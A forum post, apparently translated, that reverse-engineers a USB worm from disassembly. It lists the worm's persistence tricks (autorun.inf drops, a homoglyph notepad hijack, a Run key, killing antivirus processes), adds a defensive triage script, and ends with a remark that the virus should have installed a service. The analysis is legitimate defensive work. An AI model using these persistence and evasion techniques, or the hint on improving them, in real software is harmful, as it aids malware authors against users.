0040694D |> 8BE5 MOV ESP,EBP
0040694F |. 5D POP EBP
00406950 \. C3 RETN
That AUTORUN is out of luck...
00408897 |. FF15 84134300 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA //the virus issues the command to create AUTORUN on the C: drive
0040889D |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
004088A0 |. 837D FC FF CMP DWORD PTR SS:[EBP-4],-1
004088A4 |. 75 17 JNZ SHORT reper.004088BD
004088A6 |. FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
004088AC |. 50 PUSH EAX ; /Arg1
004088AD |. E8 0E230000 CALL reper.0040ABC0 ; \reper.0040ABC0
004088B2 |. 83C4 04 ADD ESP,4
004088B5 |. 83C8 FF OR EAX,FFFFFFFF
004088B8 |. E9 AA010000 JMP reper.00408A67
004088BD |> 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004088C0 |. 50 PUSH EAX ; /hFile
004088C1 |. FF15 80134300 CALL DWORD PTR DS:[<&KERNEL32.GetFileTyp>; \starts changing the virus's file attributes...
004088C7 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
004088CA |. 837D F4 00 CMP DWORD PTR SS:[EBP-C],0
004088CE |. 75 21 JNZ SHORT reper.004088F1
004088D0 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
004088D3 |. 51 PUSH ECX ; /hObject
The section above is the virus's code for killing AUTORUN
00413994 > /8BF4 MOV ESI,ESP ; I don't have an API reference at hand and don't know what the following means, so I'm posting the code as is
00413996 . |6A 00 PUSH 0 ; /MsgFilterMax = 0
00413998 . |6A 00 PUSH 0 ; |MsgFilterMin = 0
0041399A . |6A 00 PUSH 0 ; |hWnd = NULL
0041399C . |8D8D 7CFBFFFF LEA ECX,DWORD PTR SS:[EBP-484] ; |
004139A2 . |51 PUSH ECX ; |pMsg
004139A3 . |FF15 68144300 CALL DWORD PTR DS:[<&USER32.GetMessageA>>; \GetMessageA
004139A9 . |3BF4 CMP ESI,ESP ; I reckon the virus starts doing its damage here
004139AB . |E8 302EFFFF CALL reper.004067E0 ; by my analysis this is enumerating processes! checking whether anything threatens it
004139B0 . |85C0 TEST EAX,EAX ; judging by my earlier virus analyses, it's looking for words like "trojan" and "kill"...
004139B2 . |74 56 JE SHORT reper.00413A0A
004139B4 . |8BF4 MOV ESI,ESP
004139B6 . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484]
004139BC . |52 PUSH EDX ; /pMsg
004139BD . |8B85 78FBFFFF MOV EAX,DWORD PTR SS:[EBP-488] ; |
004139C3 . |50 PUSH EAX ; |hAccel
004139C4 . |8B8D 7CFBFFFF MOV ECX,DWORD PTR SS:[EBP-484] ; |
004139CA . |51 PUSH ECX ; |hWnd
004139CB . |FF15 6C144300 CALL DWORD PTR DS:[<&USER32.TranslateAcc>; \TranslateAcceleratorA
004139D1 . |3BF4 CMP ESI,ESP
004139D3 . |E8 082EFFFF CALL reper.004067E0
004139D8 . |85C0 TEST EAX,EAX
004139DA . |75 2C JNZ SHORT reper.00413A08
004139DC . |8BF4 MOV ESI,ESP
004139DE . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484]
004139E4 . |52 PUSH EDX ; /pMsg
004139E5 . |FF15 70144300 CALL DWORD PTR DS:[<&USER32.TranslateMes>; \TranslateMessage //sending an EXIT MESSAGE?
004139EB . |3BF4 CMP ESI,ESP
004139ED . |E8 EE2DFFFF CALL reper.004067E0
004139F2 . |8BF4 MOV ESI,ESP
004139F4 . |8D85 7CFBFFFF LEA EAX,DWORD PTR SS:[EBP-484]
004139FA . |50 PUSH EAX ; /pMsg
004139FB . |FF15 74144300 CALL DWORD PTR DS:[<&USER32.DispatchMess>; \DispatchMessageA
00413A01 . |3BF4 CMP ESI,ESP
00413A03 . |E8 D82DFFFF CALL reper.004067E0
00413A08 >^\EB 8A JMP SHORT reper.00413994
00413A0A > 8B85 84FBFFFF MOV EAX,DWORD PTR SS:[EBP-47C]
00413A10 > 5F POP EDI
00413A11 . 5E POP ESI
00413A12 . 5B POP EBX
00413A13 . 81C4 C8040000 ADD ESP,4C8
00413A19 . 3BEC CMP EBP,ESP
00413A1B . E8 C02DFFFF CALL reper.004067E0
00413A20 . 8BE5 MOV ESP,EBP
00413A22 . 5D POP EBP
00413A23 . C2 1000 RETN 10
To sum up: the virus first checks each drive for an AUTORUN; if there is one it KILLs it,
then creates REPER.EXE and AUTORUN.INF on each drive and sets the attributes: system, read-only, hidden.
Next it creates VIEWER.EXE and N0TEPAD.EXE under C:\WINDOWS, ready for every boot and for TXT files.
Then it modifies the registry, replacing NOTEPAD under HKEY_CLASSES_ROOT\txtfile\shell\open\command with its own N0TEPAD.EXE,
and creates a RUNREPER entry under Software\Microsoft\Windows\CurrentVersion\Run so its VIEWER.EXE starts every single time...
Finally it enumerates the antivirus software's APIs and CUTs any it finds...
This time the analysis is thorough, right? :)
An ordinary USB-stick virus. Comrades who are tough enough can go study Panda (熊猫) themselves; I don't dare :)
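The artefacts listed in the summary, and earlier in the registry section of reper.00401850 (the runreper Run value, the txtfile\shell\open\command hijack pointing at N0TEPAD.exe with a digit zero, and autorun.inf plus reper.exe on each drive root), are what a responder would check for. As an added example that is not part of the original post, here is an offline triage check over constructed sample data imitating a registry export and per-drive file listings; the key paths, the stock notepad command used as baseline, the snapshot layout and all function names are assumptions of mine, and the code reads no real registry or disk.

```python
# Added example (not part of the original post): an offline triage check for the
# persistence artefacts the analysis lists. Inputs are constructed samples that
# imitate a registry export and per-drive file listings; no registry or disk is read.
from typing import Dict, List

# Assumed key paths (abbreviated hive names are my own notation).
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
TXT_CMD_KEY = r"HKCR\txtfile\shell\open\command"
# Stock txtfile open command on Windows XP, used as the clean baseline (assumption).
CLEAN_TXT_CMD = r"%SystemRoot%\system32\NOTEPAD.EXE %1"


def parse_autorun_inf(text: str) -> Dict[str, str]:
    """Parse the [autorun] section of an autorun.inf into a lower-cased key -> value dict."""
    section = None
    values: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def txt_command_hijacked(command: str) -> bool:
    """True when the txtfile open command runs anything other than the real notepad.exe.

    The worm writes 'C:\\windows\\system32\\N0TEPAD.exe %1 %1 %1 %1 %1' (digit zero),
    which a lower-cased comparison of the executable's file name catches."""
    stripped = command.strip()
    if not stripped:
        return False  # no value at all is not evidence of this worm
    exe = (stripped.strip('"').split() or [""])[0]
    name = exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name != "notepad.exe"


def triage(snapshot: dict) -> List[str]:
    """Return one finding per artefact matching the worm's persistence scheme."""
    findings: List[str] = []
    registry = snapshot.get("registry", {})
    for name, data in registry.get(RUN_KEY, {}).items():
        if name.lower() == "runreper" or data.lower().endswith("\\viewer.exe"):
            findings.append(f"Run value {name!r} -> {data}")
    cmd = registry.get(TXT_CMD_KEY, {}).get("", "")
    if txt_command_hijacked(cmd):
        findings.append(f"txtfile open command hijacked: {cmd}")
    for drive, files in snapshot.get("drives", {}).items():
        autorun = files.get("autorun.inf")
        if autorun is None:
            continue
        target = parse_autorun_inf(autorun).get("open", "")
        if target and target.lower() in {f.lower() for f in files}:
            findings.append(f"{drive} autorun.inf launches {target}, present on the same root")
    return findings


# Constructed samples. The infected one mirrors the strings seen in the listing;
# the clean one carries a typical XP Run value and the stock txtfile command.
INFECTED_SNAPSHOT = {
    "registry": {
        RUN_KEY: {"runreper": r"C:\windows\viewer.exe"},
        TXT_CMD_KEY: {"": r"C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"},
    },
    "drives": {
        "C:": {"autorun.inf": "[autorun]\r\nopen=reper.exe", "reper.exe": "<binary>"},
        "E:": {"autorun.inf": "[autorun]\r\nopen=reper.exe", "reper.exe": "<binary>"},
    },
}
CLEAN_SNAPSHOT = {
    "registry": {
        RUN_KEY: {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
        TXT_CMD_KEY: {"": CLEAN_TXT_CMD},
    },
    "drives": {"C:": {"boot.ini": "[boot loader]"}},
}

if __name__ == "__main__":
    for label, snap in (("infected", INFECTED_SNAPSHOT), ("clean", CLEAN_SNAPSHOT)):
        print(label, triage(snap) or ["no findings"])
```

The txtfile check deliberately flags any executable other than notepad.exe, since a homoglyph such as N0TEPAD is meant to survive a visual glance; on a site that legitimately remaps .txt to another editor, compare against that editor instead of the stock command.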
=======================:>I'm a cute divider<:=============================
Mods, if you'd mark this as a featured post (I hardly dare ask... last time CCD gave me a thorough DEBUGging...) or at least bump my reputation to 10...
I've looked at the experts' cracking write-ups; they're far better than mine... keep working, self...
=======================:>I'm a cute divider<:=============================
Qbasic:
CLS
INPUT "Your Name,Please:",n$
PRINT CHR$(68)+CHR$(101)+CHR$(66)+CHR$(117)+CHR$(103)+CHR$(32)+CHR$(89)+CHR$(111)+CHR$(117)+CHR$(114)+CHR$(115)+CHR$(101)+CHR$(108)+CHR$(102)+"-----"+n$+CHR$(33)+CHR$(58)+CHR$(41)+CHR$(66)+CHR$(121)+CHR$(32)+CHR$(78)+CHR$(111)+CHR$(78)+CHR$(97)+CHR$(109)+CHR$(101)+CHR$(83)+CHR$(119)+CHR$(111)+CHR$(114)+CHR$(100)+CHR$(77)+ CHR$(97)+CHR$(110)
END
Vbasic:
n$ = InputBox("Your Name,Please:")
Print Chr$(68) + Chr$(101) + Chr$(66) + Chr$(117) + Chr$(103) + Chr$(32) + Chr$(89) + Chr$(111) + Chr$(117) + Chr$(114) + Chr$(115) + Chr$(101) + Chr$(108) + Chr$(102) + "-----" + n$ + Chr$(33) + Chr$(58) + Chr$(41) + Chr$(66) + Chr$(121) + Chr$(32) + Chr$(78) + Chr$(111) + Chr$(78) + Chr$(97) + Chr$(109) + Chr$(101) + Chr$(83) + Chr$(119) + Chr$(111) + Chr$(114) + Chr$(100) + Chr$(77) + Chr$(97) + Chr$(110)
Please Wait for Pascal.....Today is too late,so I don't want to qj them.....
=======================:>I'm a cute divider<:=============================
Also: the design of this virus is poor; it should have added a service :)
(And from my tests it has no real punch, it just spreads...)